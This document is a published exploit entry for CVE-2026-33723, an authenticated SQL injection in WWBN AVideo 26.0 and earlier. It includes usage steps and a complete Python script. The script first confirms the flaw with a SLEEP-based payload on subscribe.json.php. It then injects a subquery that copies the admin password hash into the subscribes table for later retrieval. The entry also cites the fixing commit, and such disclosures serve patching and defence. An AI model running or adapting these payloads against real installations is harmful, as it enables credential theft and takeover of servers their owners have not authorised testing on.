Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection
CVE: CVE-2026-33723
Date: 2026-03-25
Exploit Author: Mohammed Idrees Banyamer
Author Country: Jordan
Instagram: @banyamer_security
Author GitHub: https://github.com/mbanyamer
Author Blog: https://banyamersecurity.com/blog/
Vendor Homepage: https://github.com/WWBN/AVideo
Software Link: https://github.com/WWBN/AVideo
Affected: AVideo <= 26.0
Tested on: AVideo 26.0
Category: Web Application
Platform: Linux / Windows
Exploit Type: SQL Injection
CVSS: 7.1 HIGH
Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data.
Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c
Notes:
• Requires valid PHPSESSID from any logged-in user (regular user is enough)
• Injects data into the subscribes.email column
How to Use
Step 1:
Login to AVideo with any user account and copy the PHPSESSID cookie value
Step 2:
Edit TARGET and PHPSESSID variables in the exploit script, then run it
=== Full Python Exploit ===
#!/usr/bin/env python3
# Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection
# CVE: CVE-2026-33723
# Date: 2026-03-25
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/WWBN/AVideo
# Software Link: https://github.com/WWBN/AVideo
# Affected: AVideo <= 26.0
# Tested on: AVideo 26.0
# Category: Web Application
# Platform: Linux / Windows
# Exploit Type: SQL Injection
# CVSS: 7.1
# Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data.
# Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c
# Usage:
# python3 exploit.py
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")
import requests
import sys
import time
TARGET = "https://target.com"
PHPSESSID = "YOUR_VALID_PHPSESSID_HERE"
HEADERS = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/x-www-form-urlencoded",
}
COOKIES = {"PHPSESSID": PHPSESSID}
def send_payload(payload, endpoint="/objects/subscribe.json.php"):
data = {"user_id": payload}
url = TARGET.rstrip("/") + endpoint
try:
r = requests.post(url, data=data, cookies=COOKIES, headers=HEADERS, timeout=15)
return r
except Exception as e:
print(f"[-] Error: {e}")
return None
def main():
banner()
if not PHPSESSID or PHPSESSID == "YOUR_VALID_PHPSESSID_HERE":
print("[-] Please edit the script and set your valid PHPSESSID!")
sys.exit(1)
print(f"[*] Target : {TARGET}")
print(f"[*] Session : {PHPSESSID[:15]}...\n")
print("[+] Testing Time-Based SQL Injection...")
start = time.time()
send_payload("99999'+AND+SLEEP(5)+AND+'1")
elapsed = time.time() - start
print(f" Response time: {elapsed:.2f} seconds")
if elapsed >= 4.5:
print(" [+] Vulnerable! Time-based SQLi confirmed.")
else:
print(" [-] Not vulnerable or blocked.")
print("\n" + "="*70)
print("[+] Extracting Admin Password Hash...")
extract_payload = "99999',(SELECT pass FROM users WHERE isAdmin=1 LIMIT 1),'a','1.1.1.1',now(),now(),'1'); -- -"
send_payload(extract_payload)
print(" [+] Payload sent successfully!")
print(" [+] Admin password hash has been injected into the 'subscribes' table (email column).")
print(" [+] Check your subscriptions or database to retrieve the hash.")
print("\n[+] Exploit finished. Use responsibly!")
if __name__ == "__main__":
main()
